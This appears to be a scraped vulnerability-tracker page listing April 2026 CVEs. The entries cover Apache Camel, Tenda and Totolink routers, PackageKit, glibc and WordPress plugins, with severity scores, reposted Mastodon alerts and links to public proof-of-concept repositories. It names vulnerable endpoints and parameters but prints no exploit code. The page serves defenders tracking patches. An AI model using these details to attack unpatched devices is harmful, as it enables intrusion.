- CVE-2026-41472 - 0.67 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2019-25714 - 0.60 % (secdb.nttzen.cloud/cve/detail/)

##

CVE-2026-40858
(8.8 HIGH)

EPSS: 0.08%

updated 2026-04-27T15:31:59

2 posts

The camel-infinispan component's ProtoStream-based remote aggregation repository deserializes data read from a remote Infinispan cache using java.io.ObjectInputStream without applying any ObjectInputFilter. An attacker who can write to the Infinispan cache used by a Camel application can inject a crafted serialized Java object that, when read during normal aggregation repository operations such as

1 repos

https://github.com/dinosn/apache-camel

thehackerwire@mastodon.social at 2026-04-27T16:01:03.000Z ##

🟠 CVE-2026-40858 - High (8.8)

The camel-infinispan component's ProtoStream-based remote aggregation repository deserializes data read from a remote Infinispan cache using java.io.ObjectInputStream without applying any ObjectInputFilter. An attacker who can write to the Infinis...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-04-27T10:30:27.000Z ##

🔴 CRITICAL: CVE-2026-40858 in Apache Camel's camel-infinispan lets attackers with cache write access trigger arbitrary code execution. Patch to 4.20.0/4.14.7/4.18.2 ASAP! More info: radar.offseq.com/threat/cve-20 #OffSeq #ApacheCamel #Infosec #CVE2026_40858

##

CVE-2026-33453
(10.0 CRITICAL)

EPSS: 0.51%

updated 2026-04-27T15:31:59

1 posts

Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Apache Camel Camel-Coap component. Apache Camel's camel-coap component is vulnerable to Camel message header injection, leading to remote code execution when routes forward CoAP requests to header-sensitive producers (e.g. camel-exec) The camel-coap component maps incoming CoAP request URI query param

1 repos

https://github.com/dinosn/apache-camel

thehackerwire@mastodon.social at 2026-04-27T15:23:14.000Z ##

🔴 CVE-2026-33453 - Critical (10)

Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Apache Camel Camel-Coap component.

Apache Camel's camel-coap component is vulnerable to Camel message header injection, leading to remote code executi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31663
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T15:31:55

1 posts

In the Linux kernel, the following vulnerability has been resolved: xfrm: hold dev ref until after transport_finish NF_HOOK After async crypto completes, xfrm_input_resume() calls dev_put() immediately on re-entry before the skb reaches transport_finish. The skb->dev pointer is then used inside NF_HOOK and its okfn, which can race with device teardown. Remove the dev_put from the async resumpti

thehackerwire@mastodon.social at 2026-04-28T02:23:06.000Z ##

🟠 CVE-2026-31663 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

xfrm: hold dev ref until after transport_finish NF_HOOK

After async crypto completes, xfrm_input_resume() calls dev_put()
immediately on re-entry before the skb reaches transpor...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7125
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-27T15:31:00

1 posts

A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. Affected by this issue is the function setWiFiEasyCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument merge leads to os command injection. The attack may be initiated remotely. The exploit is publicly available and might be used.

thehackerwire@mastodon.social at 2026-04-27T13:59:52.000Z ##

🔴 CVE-2026-7125 - Critical (9.8)

A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. Affected by this issue is the function setWiFiEasyCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument merge leads to os command...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-31683
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-27T15:30:52

1 posts

In the Linux kernel, the following vulnerability has been resolved: batman-adv: avoid OGM aggregation when skb tailroom is insufficient When OGM aggregation state is toggled at runtime, an existing forwarded packet may have been allocated with only packet_len bytes, while a later packet can still be selected for aggregation. Appending in this case can hit skb_put overflow conditions. Reject agg

thehackerwire@mastodon.social at 2026-04-27T22:03:20.000Z ##

🟠 CVE-2026-31683 - High (7.8)

In the Linux kernel, the following vulnerability has been resolved:

batman-adv: avoid OGM aggregation when skb tailroom is insufficient

When OGM aggregation state is toggled at runtime, an existing forwarded
packet may have been allocated with o...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40473
(8.8 HIGH)

EPSS: 0.08%

updated 2026-04-27T15:30:52

2 posts

The camel-mina component's MinaConverter.toObjectInput(IoBuffer) type converter wraps an IoBuffer in a java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. When a Camel route uses camel-mina as a TCP or UDP consumer and requests conversion to ObjectInput (for example via getBody(ObjectInput.class) or @Body ObjectInput), an attacker sending a crafted seria

1 repos

https://github.com/dinosn/apache-camel

thehackerwire@mastodon.social at 2026-04-27T21:17:22.000Z ##

🟠 CVE-2026-40473 - High (8.8)

The camel-mina component's MinaConverter.toObjectInput(IoBuffer) type converter wraps an IoBuffer in a java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. When a Camel route uses camel-mina as a TCP or U...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-04-27T21:16:42.000Z ##

🟠 CVE-2026-40473 - High (8.8)

The camel-mina component's MinaConverter.toObjectInput(IoBuffer) type converter wraps an IoBuffer in a java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. When a Camel route uses camel-mina as a TCP or U...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7121
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-27T12:30:49

1 posts

A flaw has been found in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setWizardCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument wizard causes os command injection. It is possible to initiate the attack remotely. The exploit has been published and may be used.

thehackerwire@mastodon.social at 2026-04-27T14:24:02.000Z ##

🔴 CVE-2026-7121 - Critical (9.8)

A flaw has been found in Totolink A8000RU 7.1cu.643_b20200521. This affects the function setWizardCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument wizard causes os command injection. It is possib...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7122
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-27T12:30:49

1 posts

A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This impacts the function setUPnPCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument enable leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

thehackerwire@mastodon.social at 2026-04-27T14:23:44.000Z ##

🔴 CVE-2026-7122 - Critical (9.8)

A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This impacts the function setUPnPCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument enable leads to os command injection. It ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5941
(7.8 HIGH)

EPSS: 0.02%

updated 2026-04-27T12:30:45

1 posts

Parsing logic flaws cause non-signature data to be misidentified as valid signatures when processing malformed form field hierarchies, leading to invalid memory writes and program crashes during internal data structure construction.

thehackerwire@mastodon.social at 2026-04-27T15:00:52.000Z ##

🟠 CVE-2026-5941 - High (7.8)

Parsing logic flaws cause non-signature data to be misidentified as valid signatures when processing malformed form field hierarchies, leading to invalid memory writes and program crashes during internal data structure construction.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22336
(9.3 CRITICAL)

EPSS: 0.03%

updated 2026-04-27T12:30:44

1 posts

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Directorist Booking allows SQL Injection.This issue affects Directorist Booking: from n/a before 3.0.2.

thehackerwire@mastodon.social at 2026-04-27T16:00:53.000Z ##

🔴 CVE-2026-22336 - Critical (9.3)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Directorist Booking allows SQL Injection.This issue affects Directorist Booking: from n/a before 3.0.2.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7101
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-27T09:34:46

1 posts

A vulnerability has been found in Tenda F456 1.0.0.5. This affects the function fromWrlclientSet of the file /goform/WrlclientSet of the component httpd. The manipulation leads to buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used.

thehackerwire@mastodon.social at 2026-04-27T17:03:33.000Z ##

🟠 CVE-2026-7101 - High (8.8)

A vulnerability has been found in Tenda F456 1.0.0.5. This affects the function fromWrlclientSet of the file /goform/WrlclientSet of the component httpd. The manipulation leads to buffer overflow. Remote exploitation of the attack is possible. The...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42379
(7.7 HIGH)

EPSS: 0.03%

updated 2026-04-27T09:34:46

1 posts

Insertion of Sensitive Information Into Sent Data vulnerability in WPDeveloper Templately allows Retrieve Embedded Sensitive Data.This issue affects Templately: from n/a through 3.6.1.

thehackerwire@mastodon.social at 2026-04-27T10:29:19.000Z ##

🟠 CVE-2026-42379 - High (7.7)

Insertion of Sensitive Information Into Sent Data vulnerability in WPDeveloper Templately allows Retrieve Embedded Sensitive Data.This issue affects Templately: from n/a through 3.6.1.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7097
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-27T09:34:46

1 posts

A weakness has been identified in Tenda F456 1.0.0.5. This issue affects the function fromwebExcptypemanFilter of the file /goform/webExcptypemanFilter of the component httpd. This manipulation of the argument page causes buffer overflow. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks.

thehackerwire@mastodon.social at 2026-04-27T08:27:53.000Z ##

🟠 CVE-2026-7097 - High (8.8)

A weakness has been identified in Tenda F456 1.0.0.5. This issue affects the function fromwebExcptypemanFilter of the file /goform/webExcptypemanFilter of the component httpd. This manipulation of the argument page causes buffer overflow. The atta...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7096
(8.8 HIGH)

EPSS: 0.29%

updated 2026-04-27T09:34:46

1 posts

A security flaw has been discovered in Tenda HG3 2.0 300003070. This vulnerability affects the function formgponConf of the file /boaform/admin/formgponConf. The manipulation of the argument fmgpon_loid results in os command injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks.

thehackerwire@mastodon.social at 2026-04-27T08:27:43.000Z ##

🟠 CVE-2026-7096 - High (8.8)

A security flaw has been discovered in Tenda HG3 2.0 300003070. This vulnerability affects the function formgponConf of the file /boaform/admin/formgponConf. The manipulation of the argument fmgpon_loid results in os command injection. It is possi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7082
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-27T06:31:33

2 posts

A flaw has been found in Tenda F456 1.0.0.5. Affected by this vulnerability is the function formWrlExtraSet of the file /goform/WrlExtraSet of the component httpd. Executing a manipulation of the argument Go can lead to buffer overflow. The attack can be executed remotely. The exploit has been published and may be used.

offseq@infosec.exchange at 2026-04-27T04:30:27.000Z ##

⚠️ CVE-2026-7082: HIGH severity buffer overflow in Tenda F456 v1.0.0.5 (formWrlExtraSet in httpd). Attack is remote and exploit is public. Audit exposure & restrict remote mgmt ASAP. radar.offseq.com/threat/cve-20 #OffSeq #Vulnerability #Tenda #CVE20267082

##

thehackerwire@mastodon.social at 2026-04-27T04:19:15.000Z ##

🟠 CVE-2026-7082 - High (8.8)

A flaw has been found in Tenda F456 1.0.0.5. Affected by this vulnerability is the function formWrlExtraSet of the file /goform/WrlExtraSet of the component httpd. Executing a manipulation of the argument Go can lead to buffer overflow. The attack...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7079
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-27T03:30:34

1 posts

A weakness has been identified in Tenda F456 1.0.0.5. This affects the function fromAdvSetWan of the file /goform/AdvSetWan of the component httpd. This manipulation of the argument wanmode causes buffer overflow. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks.

thehackerwire@mastodon.social at 2026-04-27T04:00:24.000Z ##

🟠 CVE-2026-7079 - High (8.8)

A weakness has been identified in Tenda F456 1.0.0.5. This affects the function fromAdvSetWan of the file /goform/AdvSetWan of the component httpd. This manipulation of the argument wanmode causes buffer overflow. The attack may be initiated remot...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7069
(8.0 HIGH)

EPSS: 0.03%

updated 2026-04-27T00:30:33

1 posts

A security flaw has been discovered in D-Link DIR-825 up to 3.00b32. This impacts the function AddPortMapping of the file upnpsoap.c of the component miniupnpd. Performing a manipulation of the argument NewPortMappingDescription results in buffer overflow. The attack needs to be approached within the local network. The exploit has been released to the public and may be used for attacks. This vulne

thehackerwire@mastodon.social at 2026-04-27T00:21:30.000Z ##

🟠 CVE-2026-7069 - High (8)

A security flaw has been discovered in D-Link DIR-825 up to 3.00b32. This impacts the function AddPortMapping of the file upnpsoap.c of the component miniupnpd. Performing a manipulation of the argument NewPortMappingDescription results in buffer ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7068
(8.8 HIGH)

EPSS: 0.03%

updated 2026-04-27T00:30:33

1 posts

A vulnerability was identified in D-Link DIR-825 3.00b32. This affects the function NMBD_process of the file sserver.c of the component nmbd. Such manipulation leads to buffer overflow. The attack can only be initiated within the local network. The exploit is publicly available and might be used. This vulnerability only affects products that are no longer supported by the maintainer.

thehackerwire@mastodon.social at 2026-04-27T00:21:18.000Z ##

🟠 CVE-2026-7068 - High (8.8)

A vulnerability was identified in D-Link DIR-825 3.00b32. This affects the function NMBD_process of the file sserver.c of the component nmbd. Such manipulation leads to buffer overflow. The attack can only be initiated within the local network. Th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7056
(8.8 HIGH)

EPSS: 0.09%

updated 2026-04-27T00:30:33

1 posts

A vulnerability was detected in Tenda F456 1.0.0.5. Impacted is the function fromSafeUrlFilter of the file /goform/SafeUrlFilter of the component httpd. The manipulation of the argument page results in buffer overflow. The attack may be performed from remote. The exploit is now public and may be used.

thehackerwire@mastodon.social at 2026-04-26T23:00:28.000Z ##

🟠 CVE-2026-7056 - High (8.8)

A vulnerability was detected in Tenda F456 1.0.0.5. Impacted is the function fromSafeUrlFilter of the file /goform/SafeUrlFilter of the component httpd. The manipulation of the argument page results in buffer overflow. The attack may be performed ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7054
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-27T00:30:33

1 posts

A weakness has been identified in Tenda F456 1.0.0.5. This vulnerability affects the function fromPptpUserAdd of the file /goform/PPTPDClient of the component httpd. Executing a manipulation of the argument opttype/usernamewith can lead to buffer overflow. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks.

thehackerwire@mastodon.social at 2026-04-26T23:00:06.000Z ##

🟠 CVE-2026-7054 - High (8.8)

A weakness has been identified in Tenda F456 1.0.0.5. This vulnerability affects the function fromPptpUserAdd of the file /goform/PPTPDClient of the component httpd. Executing a manipulation of the argument opttype/usernamewith can lead to buffer ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7053
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-27T00:30:33

1 posts

A security flaw has been discovered in Tenda F456 1.0.0.5. This affects the function frmL7ProtForm of the file /goform/L7Prot of the component httpd. Performing a manipulation of the argument page results in buffer overflow. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks.

thehackerwire@mastodon.social at 2026-04-26T22:59:57.000Z ##

🟠 CVE-2026-7053 - High (8.8)

A security flaw has been discovered in Tenda F456 1.0.0.5. This affects the function frmL7ProtForm of the file /goform/L7Prot of the component httpd. Performing a manipulation of the argument page results in buffer overflow. Remote exploitation of...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7037
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-26T12:31:47

1 posts

A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. This issue affects the function setVpnPassCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument pptpPassThru results in os command injection. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks.

offseq@infosec.exchange at 2026-04-27T00:00:36.000Z ##

CVE-2026-7037: Totolink A8000RU (7.1cu.643_b20200521) — CRITICAL OS command injection flaw. Remote, unauthenticated exploit enables full device compromise. Restrict access & monitor systems. No patch yet. radar.offseq.com/threat/cve-20 #OffSeq #CVE #infosec #IoT

##

CVE-2026-24467
(9.0 CRITICAL)

EPSS: 0.90%

updated 2026-04-25T18:00:57.917000

1 posts

OpenAEV is an open source platform allowing organizations to plan, schedule and conduct cyber adversary simulation campaign and tests. Starting in version 1.0.0 and prior to version 2.0.13, OpenAEV's password reset implementation contains multiple security weaknesses that together allow reliable account takeover. The primary issue is that password reset tokens do not expire. Once a token is genera

secdb@infosec.exchange at 2026-04-27T00:01:17.000Z ##

📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at secdb.nttzen.cloud/dashboard

Total CVEs: 1459

Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321

Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142

Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40

Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11

Top EPSS Score:
- CVE-2026-5965 - 6.34 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41179 - 5.98 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-40887 - 4.56 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-38834 - 3.22 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41176 - 2.79 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-21571 - 1.10 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-6799 - 1.06 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-24467 - 0.76 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41472 - 0.67 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2019-25714 - 0.60 % (secdb.nttzen.cloud/cve/detail/)

##

CVE-2026-40887
(9.1 CRITICAL)

EPSS: 5.38%

updated 2026-04-24T21:10:19

1 posts

## Summary An unauthenticated SQL injection vulnerability exists in the Vendure Shop API. A user-controlled query string parameter is interpolated directly into a raw SQL expression without parameterization or validation, allowing an attacker to execute arbitrary SQL against the database. This affects all supported database backends (PostgreSQL, MySQL/MariaDB, SQLite). The Admin API is also affe

Nuclei template

secdb@infosec.exchange at 2026-04-27T00:01:17.000Z ##

📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at secdb.nttzen.cloud/dashboard

Total CVEs: 1459

Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321

Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142

Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40

Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11

Top EPSS Score:
- CVE-2026-5965 - 6.34 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41179 - 5.98 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-40887 - 4.56 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-38834 - 3.22 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41176 - 2.79 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-21571 - 1.10 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-6799 - 1.06 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-24467 - 0.76 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41472 - 0.67 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2019-25714 - 0.60 % (secdb.nttzen.cloud/cve/detail/)

##

CVE-2026-41651
(8.8 HIGH)

EPSS: 0.20%

updated 2026-04-24T13:43:37.347000

4 posts

PackageKit is a a D-Bus abstraction layer that allows the user to manage packages in a secure way using a cross-distro, cross-architecture API. PackageKit between and including versions 1.0.2 and 1.3.4 is vulnerable to a time-of-check time-of-use (TOCTOU) race condition on transaction flags that allows unprivileged users to install packages as root and thus leads to a local privilege escalation. T

5 repos

https://github.com/0xBlackash/CVE-2026-41651

https://github.com/Vozec/CVE-2026-41651

https://github.com/dinosn/pack2theroot-lab

https://github.com/baph00met/CVE-2026-41651

https://github.com/CipherCloak/CVE-2026-41651

ButterflyOfFire@mstdn.fr at 2026-04-28T15:00:54.000Z ##

Article sur une faille sur #PackageKit :

goodtech.info/pack2theroot-fai

Pour info packagekit est traduit en :
- Kabyle : 31%
- Occitan : 27%
- Breton : 22%

- Basque, Galicien, Catalan : +60%

##

linux@activitypub.awakari.com at 2026-04-26T01:29:51.000Z ## A 12-Year-Old Flaw, an AI, and Root Access: What CVE-2026–41651 Says About Linux Security The bug wasn’t new. It was just never found. PackageKit has been shipping with Linux distributions sin...

#devops #programming #vulnerability #linux #cybersecurity

Origin | Interest | Match ##

nemo@mas.to at 2026-04-27T12:00:41.000Z ##

Telekom's security team warns: “Pack2TheRoot” (CVE-2026-41651) in PackageKit lets low‑privilege users install/remove system packages and escalate to root — patch to PackageKit ≥1.3.5 and apply distro updates now: heise.de/en/news/Pack2TheRoot- 🔒🐧 #CyberSecurity #Linux

##

linux@activitypub.awakari.com at 2026-04-27T07:21:03.000Z ## Pack2TheRoot : cette vulnérabilité vieille de 12 ans menace Linux Pack2TheRoot (CVE-2026-41651), c'est le nom d'une faille de sécurité importante découverte dans un composant omniprés...

#Actu #Cybersécurité #Cybersécurité #Linux #Vulnérabilité

Origin | Interest | Match ##

CVE-2026-5450
(9.8 CRITICAL)

EPSS: 0.05%

updated 2026-04-23T18:32:57

2 posts

Calling the scanf family of functions with a %mc (malloc'd character match) in the GNU C Library version 2.7 to version 2.43 with a format width specifier with an explicit width greater than 1024 could result in a one byte heap buffer overflow.

vitobotta@mastodon.social at 2026-04-28T15:01:12.000Z ##

Three glibc CVEs, including CVSS 9.8 heap overflow in scanf (CVE-2026-5450). Affects glibc 2.7 through 2.43, that's decades of releases. When the C library has bugs, everything on Linux has bugs. Patch.

##

vitobotta@mastodon.social at 2026-04-28T15:01:12.000Z ##

Three glibc CVEs, including CVSS 9.8 heap overflow in scanf (CVE-2026-5450). Affects glibc 2.7 through 2.43, that's decades of releases. When the C library has bugs, everything on Linux has bugs. Patch.

##

CVE-2026-3844
(9.8 CRITICAL)

EPSS: 0.06%

updated 2026-04-23T14:28:55.557000

2 posts

The Breeze Cache plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'fetch_gravatar_from_remote' function in all versions up to, and including, 2.4.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. The vulnerability can only be exploited

4 repos

https://github.com/tausifzaman/CVE-2026-3844

https://github.com/0xgh057r3c0n/CVE-2026-3844

https://github.com/dinosn/CVE-2026-3844

https://github.com/im-hanzou/CVE-2026-3844

CVE-2026-33626
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-23T13:39:54.420000

2 posts

LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy's vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networ

CVE-2026-41179(CVSS UNKNOWN)

EPSS: 8.21%

updated 2026-04-23T10:52:57

1 posts

### Summary The RC endpoint `operations/fsinfo` is exposed without `AuthRequired: true` and accepts attacker-controlled `fs` input. Because `rc.GetFs(...)` supports inline backend definitions, an unauthenticated attacker can instantiate an attacker-controlled backend on demand. For the WebDAV backend, `bearer_token_command` is executed during backend initialization, making single-request unauthent

Nuclei template

secdb@infosec.exchange at 2026-04-27T00:01:17.000Z ##

📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at secdb.nttzen.cloud/dashboard

Total CVEs: 1459

Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321

Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142

Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40

Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11

Top EPSS Score:
- CVE-2026-5965 - 6.34 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41179 - 5.98 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-40887 - 4.56 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-38834 - 3.22 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41176 - 2.79 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-21571 - 1.10 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-6799 - 1.06 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-24467 - 0.76 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41472 - 0.67 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2019-25714 - 0.60 % (secdb.nttzen.cloud/cve/detail/)

##

CVE-2026-21571
(0 None)

EPSS: 1.17%

updated 2026-04-22T21:24:26.997000

1 posts

This Critical severity OS Command Injection vulnerability was introduced in versions 9.6.0, 10.0.0, 10.1.0, 10.2.0, 11.0.0, 11.1.0, 12.0.0, and 12.1.0 of Bamboo Data Center.   This RCE (Remote Code Execution) vulnerability, with a CVSS Score of 9.4 and a CVSS Vector of CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H allows an authenticated attacker to execute commands on the r

secdb@infosec.exchange at 2026-04-27T00:01:17.000Z ##

📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at secdb.nttzen.cloud/dashboard

Total CVEs: 1459

Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321

Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142

Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40

Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11

Top EPSS Score:
- CVE-2026-5965 - 6.34 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41179 - 5.98 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-40887 - 4.56 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-38834 - 3.22 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41176 - 2.79 % (secdb.nttzen.cloud/cve/detail/)
